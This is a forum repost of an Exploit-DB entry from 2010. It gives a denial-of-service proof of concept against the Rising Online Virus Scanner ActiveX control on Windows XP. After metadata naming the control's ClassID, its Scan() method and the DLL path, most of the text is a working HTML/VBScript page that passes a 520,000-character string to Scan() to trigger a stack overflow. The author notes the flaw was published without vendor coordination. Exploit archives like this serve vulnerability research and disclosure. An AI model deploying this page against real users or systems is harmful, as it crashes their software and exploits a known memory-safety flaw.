- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11492
- Проверка EDB
-
- Пройдено
- Автор
- WIREBONDER
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-02-18
HTML:
# Exploit Title: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)
# Author: wirebonder
# Software Link: http://www.rising-global.com/products/online-scanner-intro.html
# Tested on: Windows XP sp3
##
# ProgID: RavOLCtlLib.RavOnline
# ClassID: 9FAFB576-6933-4CCC-AB3D-B988EC43D04E
# Member: Scan()
# File: C:\Programme\Rising\RavOL\RavOLCtl.dll
# script safe: true
# init safe: true
#
# Because Bullshit like this is unsaleable and i don't want to waste time
# coordinating patches with this vendor this is a fulldisc publishing.
##
<html>
<body>
<object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E' id='obj'></object>
<script language='vbscript'>
buf=String(520000, "A")
obj.Scan buf
</script>
</body>
</html>
- Источник
- www.exploit-db.com